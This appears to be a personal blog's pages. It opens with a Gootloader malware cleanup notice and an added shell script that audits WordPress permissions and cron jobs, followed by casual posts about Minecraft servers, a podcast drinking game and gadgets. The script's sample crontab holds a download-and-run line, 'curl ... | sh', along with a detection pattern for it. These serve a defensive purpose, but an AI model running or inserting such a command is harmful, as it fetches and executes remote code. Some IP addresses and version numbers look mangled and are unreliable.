Gootloader infection cleaned up
Dear blog owner and visitors,
This blog had been infected to serve up Gootloader malware to Google search victims, via a common tactic known as SEO (Search Engine Optimization) poisoning. Your blog was serving up 320 malicious pages. Your blog served up malware to 0 visitors.
I tried my best to clean up the infection, but I would do the following:
- Upgrade WordPress to the latest version (one way the attackers might have gained access to your server)
- Upgrade all WordPress themes to the latest versions (another way the attackers might have gained access to your server)
- Upgrade all WordPress plugins (another way the attackers might have gained access to your server), and remove any unnecessary plugins.
- Verify all users are valid (in case the attackers left a backup account, to get back in)
- Change all passwords (for WordPress accounts, FTP, SSH, database, etc.) and keys. This is probably how the attackers got in, as they are known to brute force weak passwords
- Run antivirus scans on your server
- Block these IPs (22.214.171.124 and 126.96.36.199), either in your firewall, .htaccess file, or in your /etc/hosts file, as these are the attackers' command and control servers, which send malicious commands for your blog to execute
- Check cronjobs (both server and WordPress), aka scheduled tasks. This is a common method that an attacker will use to get back in. If you are not sure what this is, Google it
- Consider wiping the server completely, as you do not know how deep the infection is. If you decide not to, I recommend installing some security plugins for WordPress, to try and scan for any remaining malicious files. Integrity Checker, WordPress Core Integrity Checker, Sucuri Security, and Wordfence Security, all do some level of detection, but not 100% guaranteed
- Go through the process for Google to recrawl your site, to remove the malicious links (to see what malicious pages there were, go to Google and search site:your_site.com agreement)
- Check subdomains, to see if they were infected as well
- Check file permissions
Gootloader (previously Gootkit) malware has been around since 2014, and is used to initially infect a system, and then sell that access off to other attackers, who then usually deploy additional malware, to include ransomware and banking trojans. By cleaning up your blog, it will make a dent in how they infect victims. PLEASE try to keep it up-to-date and secure, so this does not happen again.
The Internet Janitor
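One way to carry out the "check file permissions" and "check cronjobs" items from the checklist above, as an added example that is not part of the original notice. The directory layout, the sample crontab and the 192.0.2.10 address are constructed placeholders, and the cron pattern is a heuristic assumption, not a Gootloader signature.

```shell
#!/bin/sh
# Added example: audit a WordPress tree for risky permissions and a saved
# crontab dump for download-and-run entries. Paths/patterns are assumptions.

# Print files and directories under $1 that any local user can write to.
world_writable() {
    find "$1" \( -type f -o -type d \) -perm -0002 -print | sort
}

# Print wp-config.php files under $1 that are readable by "other"
# (the file holds database credentials and keys).
exposed_config() {
    find "$1" -type f -name 'wp-config.php' -perm -0004 -print | sort
}

# Print non-comment lines of a crontab dump ($1, e.g. saved `crontab -l`
# output) that download something and pass it to an interpreter.
suspicious_cron() {
    grep -v '^[[:space:]]*#' "$1" |
        grep -E '(curl|wget)[^|;]*[|;][[:space:]]*(sh|bash|php)([[:space:]]|$)' || true
}

# Build a small constructed tree and crontab so the checks run offline.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/site/wp-content/uploads"
    printf '<?php // constructed\n' > "$d/site/wp-config.php"
    printf '<?php // constructed\n' > "$d/site/index.php"
    printf 'x\n' > "$d/site/wp-content/uploads/note.txt"
    chmod 755 "$d/site" "$d/site/wp-content"
    chmod 777 "$d/site/wp-content/uploads"
    chmod 644 "$d/site/index.php" "$d/site/wp-config.php"
    chmod 666 "$d/site/wp-content/uploads/note.txt"
    cat > "$d/crontab.txt" <<'EOF'
# constructed crontab dump
0 3 * * * /usr/bin/php /var/www/site/wp-cron.php
*/5 * * * * curl -s http://192.0.2.10/u.txt | sh
EOF
    echo "$d"
}
```

On a real server, point `world_writable` and `exposed_config` at the web root and feed `suspicious_cron` the saved output of `crontab -l` for each account; WordPress's own scheduled tasks live in the database and need a separate review.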
Below are some links to research/further explanation on Gootloader:
Ok, so I have the new minecraft servers up, they are whitelist only, so if you want to be added, email me at firstname.lastname@example.org.
Forge Modded 1.10.2: Mods are here. Forge 1.10.2 188.8.131.529
Forge is available here: //files.minecraftforge.net/
Pixelmon: Using 1.10.2 5.0.0, Forge 1.10.2 184.108.40.2069
Pixelmon is available here: //pixelmonmod.com/downloads.php
A social experiment involving podcasts, twitter and alcohol.
Completely Unofficial NetHeads Drinking Game Rules
AKA “Excuses for Alcoholics” (Thanks Will!) Alpha 0.8
Submit any revisions via Twitter to @routerninja.
- Any time Will starts the show more than 10 minutes late, Drink.
- Drink again if it’s due to some sort of liquid spillage catastrophe, Lemonade or otherwise.
- Should a SMeltdown occur, and you heard the original opening before the restart, drink.
- Finish your drink if the show has to restart more than once.
- Any time Will mentions a movie or TV Show Trent hasn’t seen. Drink. Rule also applies in reverse.
- Any time Trent makes an overtly homoerotic “joke” in a vague attempt at coming out, Drink.
- Any time Trent is broken, finish your drink. (Only applicable once per episode)
- Any time someone calls in, Drink.
- If Will attempts math at ANY time during the show, drink.
- If Will gets it right, drink again.
- If Will or Trent can correctly define Zeitgeist without the use of wikipedia, finish your drink.
(Unfortunately this rule only applies once)
- Any time Trent manages to sneak in any talk of fantasy football, drink.
- If you are following along on Twitter and your tweet is read on the air, drink.
- Any time Trent says “Progrum”, Drink.
- (REDACTED In the interest of my liver and public safety)
- Any time Will or Trent debate the pronunciation of someone’s Twitter handle, drink. (Thanks @Kouban, and drink twice if it’s his because I don’t think they’ve got it right yet.)
- Anytime Will gives a “Woo!”, Drink. (Thanks @Netheadww)
- Francis calling? Drink up! (Thanks Trent!)
- Anytime Will tries to segue with “I don't know about you guys..” Drink!
- Anytime Will admits to not listening to what Trent was saying while eating/drinking/updating twitter, Drink!
Please Note: Routerninja.net, Smodcast.com, The Netheads Show and their affiliates are in no way responsible for any liver damage, alcohol poisoning, drunk dialing, texting or emailing (Thanks @squidjam), bad decisions or damage to any property, sanity, sexual preference or dignity due to this game. Play at your own risk, don’t drink and drive, always keep your stick on the ice, and whatever you do, don’t miss Netheads on Sundays at 6pm Pacific, 9pm Eastern on Smodcast Internet Radio.
ONE OF US! ONE OF US!
So my mom has been officially inducted into the Cult of Mac. After having her card number stolen via malware and various recurring virus issues, she started asking me about my mac, since she used it when she was at my place in Atlanta.. So of course last night I popped into her XP machine via TeamViewer when she needed to ask me something and I see an Apple Store receipt on her screen for a new Macbook pro, iPad 2, AppleTV and applecare for everything..
Happy, but somewhat stressed since I know I’m going to have to set it all up for her, but I know the calls will be less “OMFG SOME RUSSIAN STOLE EVERYTHING” and more “Hey, how do I upload stuff in iPhoto”. and that I can handle.
And I’m not bitter at all that her laptop will be better than mine, nope, not one bit.
Maybe a little.
Once again I am late to the party..
So I came into Nerdcore late. I really got into MC Frontalot, MC Lars, Beefy, YT Cracker, and all the rest.. Now of course I have the problem of wanting to see them live, and I don't think most of them are coming anywhere near me. I missed MC Lars and MC Chris in Atlanta a couple weeks ago. So my favorite nerdcore track has got to be “Ones and Zeroes” with Beefy and YT Cracker. I dug the “Nerdy South” line, being in Atlanta and hearing the “Dirty Souf” crap, it was a nice way to bring it back to the geeks. I can't seem to find it on youtube, so you’ll have to check it out on Spotify or iTunes or whatever method you use for getting your music.. Close second would be MC Frontalot’s “Victorian Space Prostitute” which is a great breakdown of every cosplayer I have ever seen.
I’ll add more as I think of it.
Logitech finally catches up to 6 months ago.
So my Logitech Revue is finally getting the Honeycomb upgrade. I gotta admit it looks pretty cool. Mom may end up getting my ATV and I can get a 2nd Revue for the bedroom.
Got a mention on SBN #46 this week also.
SBN being Sound Bite Nation, the podcast that follows NetHeads on SIR on Sunday nights. I sent them a D-Bag of the week suggestion and it looks like they used it on their show, got a couple nice shout outs, always good to help feed the ego 🙂 Kind of took me by surprise on the way into work as I was listening and I heard my twitter handle.. Not a bad way to start the day. I admit I still get those “They said my name, I’m routerninja! I’m that guy!” moments sometimes. I know, stupid fanboy moment but it's neat to me. 🙂
Yay for Friday!
So I have settled into my job this morning as an engineer at a Death Star themed telephone company. 🙂 Got my 1 year coming up here and I’m pretty happy how things are going. Got the kids coming over tonight for another fun-filled weekend. Have to make sure to remember to hit the grocery store on the way home. I am woefully low on kid supplies. That and I think I promised Abby a meatloaf. Not sure why. Here’s to hoping the day goes by a little faster today.
So I called into NetHeads last Sunday.
It was a pretty good experience, I think there was some delay because I don't remember that much dead air and lulls in the conversation, my call starts at about the 41-42 minute mark, goes for about 10-15 minutes, and we cover a lot of ground from games to hockey. It was pretty awesome to be able to talk to Will and Trent, and I think I will have to do it again soon.
A reboot was needed.
So I have had various handles since I dialed up to my first BBS in 1985. I’ve had lots of changes in my life, love and loss. But I think it’s about time for a serious reboot. I adopted the Routerninja name as a joke when I worked at AOL. and I guess it’s kinda stuck. So I decided today to grab the domain and build something new for me..
Hope y’all like it.